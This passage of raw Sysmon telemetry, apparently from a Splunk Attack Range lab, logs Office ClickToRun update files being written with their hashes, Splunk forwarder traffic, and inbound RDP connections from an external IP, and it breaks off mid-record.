14:55:43.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AIRWER.DLLMD5=C4F9584B448607F7456E83215F340302,SHA256=1A34563E40431A8D92196C3A6B5BC657CF007A2AACE6AF637E3533A57215D5EC,IMPHASH=FD3A5921A90C7051ACBCD9D848CD6A6Atruetrue 23542300x800000000000000070952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AirSpace.Etw.manMD5=696F2B52D9A66D646A0D741419E96250,SHA256=06CD20E1AD0F7B3681BF98673C38254DF610B46E21556A76250A434637D29BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.dllMD5=2B9CA603F80FD51210DFA9A877C003D5,SHA256=5ADBDA0EDC84A229C62B608C2D4F618B7854EB0BE5C6C6FA8818F4DC2FFB2CE0,IMPHASH=AABDD5AD9F7BE258EF357469456D4E33truetrue 23542300x800000000000000070950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ADALPREVIOUS.DLLMD5=DC3602F81BB966990E6A20EA7D64AB56,SHA256=827F2501C7FE92FA50A29D6E86D828869E3EB715BE09558DF572EB24D81C7A7D,IMPHASH=996532C1CC522BB7B857839BE368BF58truetrue 23542300x800000000000000070949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ADAL.DLLMD5=19FB29F8346A9E2073B37A5F36DF8349,SHA256=147CEC2B66F2AA85F681D33D5AFD02E0B48B6BBEB9E0F780FE10FD1DDB7A2766,IMPHASH=0CA72982BAB70940FDE0377D81985A3Btruetrue 23542300x800000000000000070948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEXBE.DLLMD5=F01369CB90507C3AF2FE440F4B8584F6,SHA256=A89E883177896B4254DCEA97294E3159B942CC7BA36BF46BC54B5CB9AD6C3A38,IMPHASH=F0ABF16281F01357F820BD7E3679EDE4truetrue 23542300x800000000000000070947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEWSS.DLLMD5=D2AD28F42CB06289426916B6CD3235E2,SHA256=B2D489EFAA341F0A4A28227B8CDC47C5027D4B5FBC71D2E5DC52C2721EB867F5,IMPHASH=8A664CC19D113269657907BA27712F06truetrue 23542300x800000000000000070946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEWDAT.DLLMD5=1821DEB27D36E0FEA5A8B4FA02300C15,SHA256=47BC79EF77C8232C3F6539F8295AD01CC3C71CBC4B9FC4D113EB703D848D942C,IMPHASH=9BE905A5EA9B446A03591439F984B046truetrue 23542300x800000000000000070945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACETXT.DLLMD5=D55D203BC789AF816654E3F2E01EB1F1,SHA256=CA0D7BA322C715FBB34EEB53BDCC94F327F98A46DB6B9CBF8F9A087C01199CDE,IMPHASH=F6CDA0CC917294816E195618DA93C7F9truetrue 23542300x800000000000000070944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEOLEDB.DLLMD5=D7B4BAB76B0C0D069A9A5A289F7FACDC,SHA256=9A4BD30CB85667612E17FE9B426CEFDF386991CC79FF1BFE6D1E7E9ADE3C65FD,IMPHASH=F33180E4770ABDAD185DC1D38981F86Btruetrue 23542300x800000000000000070943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODTXT.DLLMD5=36D602177C2E5CFACAD664C29E547E16,SHA256=D4F4CA3E260B0D1D1EC3AF85C0CAC90395267407009FC97C6DD91DBDF31C12ED,IMPHASH=22D409DEFB7358610450A1C90B013119truetrue 23542300x800000000000000070942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODEXL.DLLMD5=0C2E6819C5DD83B9136AFCB444D31775,SHA256=A0C17D6EFA5E4243164BF49AA393728CE87E220C207298F366A576CD2BC996BD,IMPHASH=22D409DEFB7358610450A1C90B013119truetrue 23542300x800000000000000070941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODDBS.DLLMD5=FC4E84652ACF2E97CCFF1693D3463FB4,SHA256=9BA9E42810CD616143C7511059AA33A9E4331965CF1F61893472B993A107A8DF,IMPHASH=22D409DEFB7358610450A1C90B013119truetrue 23542300x800000000000000070940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODBC.DLLMD5=750584FAB3AADE02A3D123C318C84DD8,SHA256=16113EA6B85435DDFEDC259A3E981CC21A483045E30769012A467BC9F246253A,IMPHASH=3CE02E6B70D5140A7F6FADF4BF6FDE76truetrue 23542300x800000000000000070939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODATASERVICE.DLLMD5=82E5F1EE943CE4504A8988F1015EFA6C,SHA256=75DE41E714F01019C28F095FD915494FC1F2F4A3FA7E935EE57CD6F5956111D2,IMPHASH=44436AB7952DA702FCC686D27F875998truetrue 23542300x800000000000000070938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODATA.DLLMD5=2B3C6650BA073DD9F957EFBF91EC2FE1,SHA256=DA9099C0FEF3A42A628DD329F43CB485D5355D00F1F740A4FA06C01E932D7130,IMPHASH=F567CA4648E064E535C413C8F513E56Ctruetrue 23542300x800000000000000070937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEEXCL.DLLMD5=77E3A4A545D3CBEE36850376CFED873C,SHA256=07B1DC1CC8C1882BA663583853CC5DB5BB4D5B3087B6029F2B307E8A135F78BA,IMPHASH=E5D6A9D68A163606AA1C9526908EA72Dtruetrue 23542300x800000000000000070936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEEXCH.DLLMD5=31A51BEA134C3FC469267AC0479A7FD8,SHA256=8BE100BFBF98B953012A07CF7835BD2B3D8D246D20DC80EFEF8DDD12D5F073CC,IMPHASH=5810E4C40EA5F78AA200ED7A07425A94truetrue 23542300x800000000000000070935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEES.DLLMD5=4242627C5F338FB962AAFB046D4ED637,SHA256=CAEEBD30FE7E1151D3BED32C6FA389670D71CB35645A5BDE08C9CB815F6F7319,IMPHASH=FFC3138C5E1CB1E87FCFD36E98AB6883truetrue 23542300x800000000000000070934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEERR.DLLMD5=53C8B83B48ED25C507A19DAD26BCB006,SHA256=536FE087340FFC8E0777DA20232397D1E677BBFAA109586227C641BC5D303D07,IMPHASH=D2B514AEFAE30B3CF3FDA75BAB7FE843truetrue 23542300x800000000000000070933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEDAO.DLLMD5=2072FE4A41413E3FFCFBCEEF6FF24EFD,SHA256=41ECBDB4204DADC71DFF1EAE53E7844B656A175488EC0EF8D64BC5275FE118FC,IMPHASH=E56C0256A44C77C9B3055B5C2C510CD9truetrue 23542300x800000000000000070932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACECORE.DLLMD5=193F965FAD4D42536FB6A768F8BC5EA8,SHA256=A61AF86033E8872583F82BF7075058B44085070AE06A59F444E8F64DBD36AAAE,IMPHASH=26EB4508D28519257A73777829AC1822truetrue 23542300x800000000000000070931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\WordCapabilities.jsonMD5=4AECDFEF29ABBD428BF79AD7561F0DEC,SHA256=FAEC792B11088B168FD3E8660A0F2B8351161042FC020D569D817F7D4AAD8CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\PowerPointCapabilities.jsonMD5=E5C6136124F6DB2509D0929665A5BB18,SHA256=8C9B20B76281E12BF7ED7ECF1412DCE5F5C20E3A5C7920578597FBCEB5399873,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\ExcelCapabilities.jsonMD5=55837B5269C267E57FFBAD41DC50407F,SHA256=91089A368E093E637C3F6AF4A2CC896C3384EE32AEFA3C827E7129535E9AE643,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\CommonCapabilities.jsonMD5=CC3855BD7468C808461FC391CD5CA7AE,SHA256=B91D91CCDB34334B6CF1948FB25CEB85C8D6D80DD2D38405640B4C6E739CF6DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\SETUP.CHMMD5=DC5E517D29BF0971C80DF273B7D44652,SHA256=3BFF1157F879C8108F26A70AD294D6AFAE9128FD46837489574CBBFB323D2ECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10R.CHMMD5=23982D66035CE41830C10FD8D76A2437,SHA256=667A1A936954AEBD0ED71AF608A6D9AFBE6DAF01A9F78C60813690EE1D46CA96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10O.CHMMD5=06BAB5B62F2A47089DF0E2DF4F044D68,SHA256=646B1F0D40ED68208D04E7FE9AF59BA9AE3CF0162A037672E913E4DD6897989F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\BRANDING.XMLMD5=A7E130C724D149E7CC8F76781B13E9CC,SHA256=C3E8BE58F0D4A7757EB2403F894465C58260414E32130DEFEE8148C7863AF052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\BRANDING.DLLMD5=1CF890F721C0242B80B498F7427B18C4,SHA256=B5C0C47C83E216ECA3A27AE283ADDDAE2E517580A78C653ECF1DAF224B234DF4,IMPHASH=D6158AA25A9B2A4B3831EEA238928506truetrue 23542300x800000000000000070922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\en-us\oregres.dll.muiMD5=2C3AA3EEB08AABF89D58C847A4E164FC,SHA256=C6EE94DD908F22F3695C45D362E70624349BDC4AC3299A181583B2F93B29AFA0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmsrv_xl.dllMD5=C87F64703BD221F262DAE516B820CCC1,SHA256=37F9DF552B976E6502C9A2BD3B7697892331EFBF166CD889DB83599C1B5B3EBE,IMPHASH=67FD41D2224D6FC677E582F1F2EB9D29truetrue 23542300x800000000000000070920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmlrw_xl.dllMD5=0A2A5755C636DEAAFDCCF966A54AA6BE,SHA256=E1A892925DEE885E5A07C6998D6CEA2A56832E020E08E8426AE490F754BE0634,IMPHASH=9C2D03AB590F9DB409C8ECBB2409A95Etruetrue 23542300x800000000000000049808Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:43.554{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4FF0B1B09BF5C8AAD4E431032101E34,SHA256=0B4689D8C3E41852FF9CCD32DE4669F7689E02D073C420D509AE3C1D6DF95051,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049807Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:41.573{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60197-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049806Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:41.395{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57243-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049805Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:43.116{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A893C33F79B25E5E516562B22E62ECF9,SHA256=72364ADB77396A7F68733B3DCD230B5F0744D365D7107CE02A656F85CE7BEADC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:44.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso98win32client.dllMD5=BE7E772AFD93C42CF168B5C53CA8BC3A,SHA256=0700326322F143CB757524E50F28F117EBF8853E205D5FE5C4BD4C0B7CA9EFA0,IMPHASH=2B0D47FB95610C41F4D713FA52456A3Btruetrue 354300x800000000000000070992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.258{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57506-false10.0.1.12-8000- 354300x800000000000000070991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.143{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52251-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:44.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso50win32client.dllMD5=3ADBDEED826062A320DEED2481B0E239,SHA256=CD25776F0916CC47889AEDE2D186CC4ED5DD4D72028FDD61D9A93FE52FEE25EB,IMPHASH=954E116A04E32311471694CC291F02FCtruetrue 23542300x800000000000000070989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:44.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso40UIwin32client.dllMD5=E787C0B96EF0DD088982B950D6206287,SHA256=E12B0AB8449CFA108CA4158C6E61A35D7630DB723C0B48D9A8D6ABEB68BB1D42,IMPHASH=FCDF1566D2E5790CB56FB1BD200292DCtruetrue 23542300x800000000000000070988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:44.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 